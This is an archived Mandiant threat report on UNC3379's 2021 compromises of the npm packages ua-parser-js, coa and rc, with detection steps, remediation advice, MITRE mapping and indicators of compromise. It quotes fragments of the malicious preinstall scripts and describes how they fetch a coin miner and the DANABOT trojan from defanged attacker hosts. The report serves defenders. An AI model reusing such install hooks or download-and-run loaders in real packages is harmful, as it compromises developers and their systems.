{
	"id": "12ec5eab-596d-48fd-afb9-fcb00a91e440",
	"created_at": "2026-04-06T00:11:42.383598Z",
	"updated_at": "2026-04-10T03:37:32.751768Z",
	"deleted_at": null,
	"sha1_hash": "cc61ec27c56eb729fe451f3153aea11424a7cd1a",
	"title": "No Unaccompanied Miners: Supply Chain Compromises Through Node.js Packages | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1413615,
	"plain_text": "No Unaccompanied Miners: Supply Chain Compromises Through\r\nNode.js Packages | Mandiant\r\nBy Mandiant\r\nPublished: 2021-12-15 · Archived: 2026-04-05 19:55:42 UTC\r\nWritten by: Alessandro Parilli, James Maclachlan\r\nStarting mid-October 2021, Mandiant Managed Defense identified multiple instances of supply chain compromises\r\ninvolving packages hosted on Node Package Manager (NPM), the package manager for the Node.js JavaScript platform,\r\neither being compromised directly to deliver malware or simply being created to impersonate popular, legitimate packages.\r\nThe latter is a technique known as typosquatting. NPM modules are a valuable target for threat actors due to their popularity\r\namongst developers. They also have a high prevalence of complex dependencies, where one package installs another as a\r\ndependency often without the knowledge of the developer. Furthermore, the NPM repository npmjs.com does not require the\r\ncode within the NPM package to be the same as the code within the linked GitHub repository. This means that the GitHub\r\nrepository does not need to be compromised; only the NPM package.\r\nWhile Mandiant assesses multiple threat groups to be leveraging these types of compromises, there is one prolific actor,\r\nUNC3379, whose activity will be discussed.\r\nSupply Chain Compromises\r\nBy compromising a popular package used by developers, it is easy to amplify the distribution of malicious code directly to\r\nvictims themselves at scale. This can be done either through dependency confusion, hijacking weak credentials, exploiting\r\nvulnerabilities to access the target code or using the names of packages abandoned by their developers. For example, in\r\n2018, the NPM module “flatmap-stream” was compromised to deliver cryptocurrency stealing malware. This module was\r\nused as a dependency of the much more popular library “event-stream”. 
In doing so, the threat actors were able to achieve\r\ncompromises at scale with minimal effort. Figure 1 is a high-level diagram that demonstrates the threat actor’s process for\r\nsaid attack.\r\nFigure 1: Stages of infection via a malicious/compromised developer library\r\nhttps://www.mandiant.com/resources/supply-chain-node-js\r\nPage 1 of 9\n\nThe following are the stages of infection via a malicious/compromised developer library, as seen in Figure 1:\r\n1. Attacker collects information about the build pipeline and code base through open-source intelligence gathering.\r\n2. Attacker builds and publishes the custom package.\r\n3. Pipeline grabs the most recent package and deploys it without validation.\r\n4. Malicious code is deployed, through which an attacker can collect sensitive information such as cryptocurrency wallet\r\ninfo or credentials.\r\nA supply chain attack is nothing new. In 2017, the world was hit with the attack dubbed NotPetya. The malicious code,\r\ndisguised as ransomware, exploited the NSA’s leaked EternalBlue vulnerability to infiltrate networks and then\r\nsystematically destroy data. The attackers behind NotPetya breached a financial services software company that was a\r\nsupplier for the Ukrainian Government.\r\nIn the same year, the utility CCleaner suffered a breach and hackers were able to replace the legitimate version of the\r\nsoftware with a malicious one, which resulted in the compromise of more than 2 million hosts.\r\nIn 2020, UNC2452, a threat actor whose targeting is assessed to be consistent with Russian strategic interests, conducted a\r\nwidespread supply chain attack leveraging a SolarWinds component. The breadth of victims impacted by UNC2452\r\nincluded government organizations and Fortune 500 companies. 
Once again, attackers targeted the supply chain by injecting\r\nbackdoor code into the software component Orion, giving them access to the internal environment of the victims and\r\ndeploying the SUNBURST malware after the updated code was distributed through a legitimate process. Mandiant was the\r\nfirst to detect and investigate the attack.\r\nAnother variation on the theme is the poisoning of open-source repositories, as happened in this case with the NPM\r\npackages. NPM packages have been abused both by malicious actors and by security researchers with the aim of raising\r\nawareness of the issue.\r\nSpotlight: UNC3379\r\nua-parser-js Compromise\r\nAccording to a GitHub issue raised on Oct. 22, 2021, at approximately 12:15 UTC, the NPM package “ua-parser-js”, a\r\npopular Node.js library that amassed over 7 million downloads per week, was compromised to deliver malware. The threat\r\nactor was able to publish three malicious versions of the package by hijacking the author’s NPM account. According to the\r\nrepository’s Git log, on Oct. 22, between 16:14 UTC and 16:25 UTC the package author committed a sanitized version of\r\nthe malicious packages to stop further compromises.\r\nMandiant detected and responded to identical activity on systems across multiple organizations and industries. Mandiant\r\ntracks this cluster of activity as UNC3379. 
In addition to investigating the detected intrusions, Mandiant Managed Defense\r\nproactively searched through the environments of our customers to uncover additional evil.\r\n“ua-parser-js” is a lightweight, small-footprint package deployed within a web application or server-side application to\r\nextract and filter the relevant data needed to parse a User Agent string (i.e., Browser, Engine, OS, CPU, and Device).\r\nIn this compromise, UNC3379 added multiple malicious scripts to the package that would ultimately result in the download\r\nand execution of both a Monero coin miner and a banking trojan known as DANABOT, depending on the operating system.\r\nThe compromised versions of “ua-parser-js” were versions “0.7.29”, “0.8.0” and “1.0.0”.\r\nAnalysis of the Malicious Scripts Added to the Package\r\nThe infection was triggered by the package installation alone. The directive “preinstall” in the “package.json” file was used\r\nto execute a custom script before the actual installation process began. The executed script was named “preinstall.js”.\r\npackage.json:145: \"preinstall\": \"start /B node preinstall.js \u0026 node preinstall.js\",\r\nThe script “preinstall.js” performed a check to identify the underlying operating system:\r\nWindows – use of cmd.exe to execute “preinstall.bat”\r\npreinstall.js:23: const bat = spawn('cmd.exe', ['/c', 'preinstall.bat']);\r\nLinux – use of bash to execute “preinstall.sh”\r\npreinstall.js:4: exec(\"/bin/bash preinstall.sh\", (error, stdout, stderr) =\u003e {\r\nMac OSX – no execution\r\nThe shell script “preinstall.sh” performed a check on the victim’s geographical location:\r\npreinstall.sh:1: IP=$(curl -k hxxps://freegeoip.app/xml/ | grep 'RU\\|UA\\|BY\\|KZ')\r\nIf the victim was located in Russia, Ukraine, Belarus or Kazakhstan, the script terminated its execution. 
Otherwise, it\r\nproceeded to check whether the process “jsextension” already existed on the host. The script then tried to retrieve the\r\nresource “jsextension” from the IP address “159.148.186[.]228” using curl, falling back to wget if the download using curl\r\nhad failed (Figure 2). The executable “jsextension” was a Monero coin miner that was later executed with the aim of mining\r\nMonero cryptocurrency for the wallet:\r\n49ay9Aq2r3diJtEk3eeKKm7pc5R39AKnbYJZVqAd1UUmew6ZPX1ndfXQCT16v4trWp4erPyXtUQZTHGjbLXWQdBqLMxxYK\r\nusing the mining pool MineXMR.\r\nFigure 2: preinstall.sh – download and execution of jsextension\r\nUnlike its Linux counterpart, the Windows script “preinstall.bat” did not have any geographical check. Instead, it proceeded\r\nto attempt to retrieve a resource from the IP address “159.148.186[.]228” using “curl.exe”, or “wget.exe” if “curl.exe”\r\nfailed. If both failed, it finally leveraged “certutil.exe” to download the remote payload (Figure 3). The resource\r\ndownloaded, “jsextension.exe”, was the Windows version of the Monero coin miner and was executed with the same\r\nparameters as its Linux counterpart. Additionally, the script tried to download a resource from the URL\r\n“hxxps://citationsherbe[.]at/sdd.dll” and save it to disk with the filename “create.dll” located in the project’s\r\n“node_modules/ua-parser-js” directory. 
Mandiant analysis revealed the DLL to be consistent with DANABOT, whose config\r\ncontained the following command and control (C2) servers:\r\n185.158.250[.]216:443\r\n45.11.180[.]153:443\r\n194.76.225[.]46:443\r\n194.76.225[.]61:443\r\nFigure 3: preinstall.bat – download of “jsextension.exe” and “create.dll”\r\nThe script subsequently utilized the native binary “tasklist.exe” to enumerate the running processes on the system to check if\r\nthe coin miner executable “jsextension.exe” was already running before executing both the coin miner and the DANABOT\r\nDLL. The script attempted to execute DANABOT by leveraging regsvr32.exe to silently register the DANABOT DLL\r\n(“create.dll”) with the command “regsvr32.exe -s create.dll” (Figure 4).\r\nFigure 4: preinstall.bat – execution of “jsextension.exe” and “create.dll”\r\nua-parser-js has been targeted before\r\nThis is not the first time the NPM module “ua-parser-js” has been targeted. On Oct. 14, 2021, a malicious NPM module\r\nnamed “klown” was uploaded to “npmjs.org” (Figure 5). This module attempted to impersonate the legitimate “ua-parser-js”\r\nmodule by utilizing its branding, repository links, homepage and documentation, and even leveraging the website\r\n“contrib.rocks” to collect an image of all of the contributors to the “ua-parser-js” repository, all in an attempt to\r\nappear legitimate. Prior to its removal from npmjs.org, the malicious package already had 23 downloads. Mandiant assesses\r\nwith high confidence the threat actor responsible to be UNC3379 based on the large overlap in tactics, techniques and\r\nprocedures (TTPs). Mandiant assesses that this module impersonation served as an opportunity to test the malware delivery\r\nbefore the compromise of the real package on Oct. 
22.\r\nFigure 5: The npmjs.org page for the “klown” package.\r\nIn this particular instance, the malicious package also deployed the same Monero miner (MD5:\r\nfc724eb2894f34a3aca4b952d2f816cd), which was downloaded from the URL\r\n“hxxp://185.173.36[.]219/download/jsextension.exe” by a script that was also named “preinstall.bat”.\r\nCoa \u0026 rc Module Compromises\r\nIn another iteration of the attack, the NPM packages “coa” and “rc” were targeted in a fashion similar to that observed\r\nagainst “ua-parser-js”. On Nov. 4, these popular libraries were subject to several updates containing malicious code designed\r\nto download and execute a slightly modified version of the DANABOT DLL seen earlier in the attack on Oct. 22, 2021. This\r\ntime, the target OS was restricted to Windows. Mandiant assesses with high confidence the threat actor responsible to also\r\nbe UNC3379 due to the overlap in TTPs. Following the discovery of the malicious packages, the NPM security team\r\nremoved the compromised versions of “coa” and “rc”.\r\nMandiant Managed Defense identified and responded to a compromise where these packages were leveraged. The malicious\r\nversion of the package “rc” was present on the host as a dependency of the “hint” NPM package, used in one of the victim’s\r\nprojects (Figure 6).\r\nFigure 6: Dependency tree showing the relation between the package “hint” and the hijacked dependency package “rc”\r\nversion 2.3.9\r\nThis is indicative of the fact that a malicious package can easily be delivered unbeknownst to the user, due to the recursive\r\nnature of dependencies used in NPM packages. 
A single application can have dozens of packages incorporated within its\r\ncode as part of the application build process.\r\nHow to Check if the Malicious Packages Were Downloaded\r\nThe NPM command line tool can be used to check if a specific version of a package was previously downloaded. For the\r\ncases presented, the relevant malicious versions were, respectively:\r\nua-parser-js versions 0.7.29, 0.8.0, 1.0.0\r\ncoa versions 2.0.3, 2.0.4, 2.1.1, 2.1.3, 3.1.3\r\nrc versions 1.2.9, 1.3.9, 2.3.9\r\nThe command npm cache ls shows the history of the fetched packages, complete with the version:\r\n# npm cache ls rc\r\nmake-fetch-happen:request-cache:https://registry.npmjs.org/rc\r\nmake-fetch-happen:request-cache:https://registry.npmjs.org/rc/-/rc-1.2.8.tgz\r\nThe output of the command “npm cache ls rc” reveals the downloaded version of the “rc” package, in this case 1.2.8.\r\nAdditionally, to show a full tree of the dependencies used in a package, launch the command \"npm ls -a\" from the package\r\ndirectory.\r\nConclusion\r\nSupply chain compromises are designed to abuse the trust in third-party providers to indirectly gain access to a victim’s\r\nenvironment, which can be difficult to detect. By proactively and consistently monitoring our customers for threats resulting\r\nfrom supply chain compromises, Mandiant Managed Defense was able to find this type of evil and assist our customers with\r\nremediation where malicious packages were installed within their environments. 
As a result of this, Mandiant did not\r\nidentify any further malicious activity following the initial compromise at any of our customers.\r\nPrevention and Remediation\r\nCheck for the presence in your environment of any of the mentioned packages.\r\nMake sure the installed “coa” package version is 2.0.2, the latest stable at the time of writing.\r\nMake sure the installed “rc” package version is 1.2.8, the latest stable at the time of writing.\r\nMake sure the installed “ua-parser-js” package versions are 0.7.30, 0.8.1 or 1.0.1, the latest stable at the time of writing.\r\nCheck for the existence in the environment of the malicious files detailed in this blog post and remove them (refer to\r\nthe IOC section).\r\nAny secrets or credentials on the infected host should be considered compromised and changed.\r\nConsider locking (pinning) package version numbers to prevent auto-installing a new package version that may be malicious.\r\nMalware Definitions\r\nDANABOT\r\nDANABOT is a backdoor written in Delphi that communicates using a custom binary protocol over TCP. The backdoor\r\nimplements a plug-in framework that allows it to add capabilities via downloaded plugins. DANABOT's capabilities include\r\nfull system control using a VNC or RDP plugin, video and screenshot capture, keylogging, arbitrary shell command\r\nexecution, and file transfer. DANABOT's proxy plugin allows it to redirect or manipulate network traffic associated with\r\ntargeted websites. This capability is often used to capture credentials or payment data. 
DANABOT can also extract stored\r\ncredentials associated with web browsers and FTP clients.\r\nMITRE ATT\u0026CK Mapping\r\nATT\u0026CK Tactic Category Techniques\r\nResource Development T1608.003: Stage Capabilities: Install Digital Certificate\r\nInitial Compromise T1195.002: Supply Chain Compromise: Compromise Software Supply Chain\r\nExecution\r\nT1059: Command and Scripting Interpreter\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nDefense Evasion\r\nT1218.010: Signed Binary and Proxy Execution: Regsvr32\r\nT1055: Process Injection\r\nT1497.001: Virtualization/Sandbox Evasion: System Checks\r\nT1027: Obfuscated Files or Information\r\nDiscovery\r\nT1518: Software Discovery\r\nT1057: Process Discovery\r\nCommand and Control\r\nT1573.002: Encrypted Channel: Asymmetric Cryptography\r\nT1105: Ingress Tool Transfer\r\nT1071.004: Application Layer Protocol: DNS\r\nImpact T1496: Resource Hijacking\r\nIOCs\r\nIOC Notes MD5\r\npackage.json Conf JSON (ua-parser-js) 13f840772c7c04c7d2f4c202ff957b0c\r\npreinstall.js Javascript (ua-parser-js) a4668a1b3f23b79ef07d1afe0152999e\r\npreinstall.sh Shell script (ua-parser-js) de8b54a938ac18f15cad804d79a0e19d\r\npreinstall.bat cmd script (ua-parser-js) d98a3013336b755b739d285a58528cbe\r\nsdd.dll Danabot DLL (ua-parser-js) de8b54a938ac18f15cad804d79a0e19d\r\njsextension.exe coin miner (ua-parser-js) fc724eb2894f34a3aca4b952d2f816cd\r\n185.158.250[.]216 C2 IP address (ua-parser-js) /\r\n45.11.180[.]153 C2 IP address (ua-parser-js) /\r\n194.76.225[.]46 C2 IP address (ua-parser-js) /\r\n194.76.225[.]61 C2 IP address (ua-parser-js) /\r\n159.148.186[.]228 IP address hosting the coin miner (ua-parser-js) /\r\ncitationsherbe[.]at Domain hosting the Danabot DLL (ua-parser-js) /\r\nsdd.dll Danabot DLL (coa) 9c6664390b305a8aeeec859ab8169095\r\nsdd.dll Danabot DLL (rc) 429dd6c558041f945d00ba70261117f6\r\npastorcryptograph[.]at Domain hosting 
the Danabot DLL (coa and rc) /\r\n185.117.90[.]36 C2 IP address (coa and rc) /\r\n193.42.36[.]59 C2 IP address (coa and rc) /\r\n185.106.123[.]228 C2 IP address (coa and rc) /\r\n193.56.146[.]53 C2 IP address (coa and rc) /\r\nAcknowledgements\r\nSpecial thanks to Andrew Rector, Bryce Abdo, Cian Lynch, Nader Zaveri and Yash Gupta for their assistance on the topic.\r\nSource: https://www.mandiant.com/resources/supply-chain-node-js",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.mandiant.com/resources/supply-chain-node-js"
	],
	"report_names": [
		"supply-chain-node-js"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434302,
	"ts_updated_at": 1775792252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cc61ec27c56eb729fe451f3153aea11424a7cd1a.pdf",
		"text": "https://archive.orkl.eu/cc61ec27c56eb729fe451f3153aea11424a7cd1a.txt",
		"img": "https://archive.orkl.eu/cc61ec27c56eb729fe451f3153aea11424a7cd1a.jpg"
	}
}